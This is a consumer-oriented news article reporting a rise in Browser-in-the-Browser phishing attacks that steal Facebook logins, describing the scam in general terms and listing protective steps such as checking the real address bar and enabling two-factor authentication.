Hackers are increasingly using a new and highly deceptive technique called Browser-in-the-Browser (BitB) to steal Facebook login details, catching even the careful users off guard.
According to a report by the cybersecurity firm Trellix, there has been a sharp increase in attacks using the BitB method that tricks people into handing over their Facebook usernames and passwords. This technique creates a fake login window that resembles a real Facebook pop-up, making the scam extremely difficult to spot.
How The Scam Works
Most BitB attacks begin with phishing emails or messages designed to create urgency. In a typical attack, users receive an alarming message claiming to be from Facebook, Meta, or even law firms. The message may warn about copyright infringement, suspicious login attempts, or an impending account suspension. To fix the issue, users are urged to click a link.
When users click the link, they are taken to an attacker-controlled webpage where a fake browser pop-up suddenly appears, asking the user to log in to Facebook. While it looks legitimate — complete with Facebook branding and a familiar web address — the window is actually part of the webpage itself, created using hidden web elements called iframes.
Once the user enters their login details, the details are immediately sent to the attackers, who can then take over the account.
Why This Trick Is So Dangerous
The BitB method was first demonstrated by a security researcher mr.d0x in 2022 as a proof of concept. Criminals quickly adopted it because it takes advantage of something most people trust: familiar login pop-ups.
What makes these campaigns especially dangerous is the use of legitimate cloud hosting services such as Netlify and Vercel, and hiding malicious links behind shortened URLs and fake Meta CAPTCHA pages. Since these services are widely trusted, security filters are less likely to block them, and users are more likely to assume the pages are safe.
Why Facebook Remains A Major Target
With more than three billion active users worldwide, Facebook remains one of the most attractive targets for cybercriminals. Stolen accounts are commonly used to spread scams, steal personal information, or carry out identity fraud, often by exploiting trust within the victim’s social network.
How To Protect Yourself
Trellix warns that traditional visual checks are no longer enough to detect modern phishing scams. However, users can reduce their risk by following a few simple but effective steps to stay safe:
- Avoid clicking links in unsolicited emails or messages that claim your Facebook account is at risk. Instead, open a new tab and go directly to facebook.com to check account alerts.
- Be cautious of login pop-ups and try dragging them outside the browser window
- Check the real address bar, not the URL shown inside the pop-up.
- Enable two-factor authentication (2FA) on your Facebook account. This adds an extra layer of protection even if passwords are stolen.
As phishing techniques continue to evolve, experts stress that staying cautious — and slowing down before clicking — may be the best defense to protect online accounts.
